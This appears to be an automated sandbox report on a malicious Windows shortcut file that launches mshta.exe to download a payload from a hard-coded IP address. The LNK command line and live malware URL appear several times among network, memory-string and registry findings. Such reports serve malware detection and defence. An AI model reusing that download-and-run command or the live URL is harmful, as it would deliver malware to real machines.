Source: 3d#U044f.lnk
ReversingLabs: Detection: 23%
Source: Joe Sandbox View
ASN Name: MIVOCLOUDMD MIVOCLOUDMD
Source: global traffic
HTTP traffic detected:
  GET /pr/relationship.tmp HTTP/1.1
  Accept: */*
  Accept-Language: en-CH
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 194.180.191.34
  Connection: Keep-Alive
Source: unknown
TCP traffic detected without corresponding DNS query: 194.180.191.34
Source: mshta.exe, 00000000.00000002.2641916016.000001374E6F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmp, 3d#U044f.lnk
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp%
Source: mshta.exe, 00000000.00000002.2641916016.000001374E7B6000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp...
Source: mshta.exe, 00000000.00000002.2642393986.000001374E870000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp/fternet
Source: mshta.exe, 00000000.00000002.2641916016.000001374E6FE000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp1
Source: mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpC:
Source: mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpE
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpndowsINetCookies
Source: mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpq
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpvJ
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpy
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: https://login.live.com
Source: Initial file
Strings: http://194.180.191.34/pr/relationship.tmp
Source: 3d#U044f.lnk
LNK file: http://194.180.191.34/pr/relationship.tmp /f
Source: C:\Windows\System32\mshta.exe
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine
Classification label: mal76.rans.winLNK@1/0@0/1
Source: C:\Windows\System32\mshta.exe
File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\relationship[1].ps
Source: C:\Windows\System32\mshta.exe
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\mshta.exe
Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe
Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe
Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: LNK file
Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exe
Process information set: NOOPENFILEERRORBOX
Source: all processes
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: Hyper-V RAWp_
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2641916016.000001374E7AA000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\mshta.exe
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe
Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation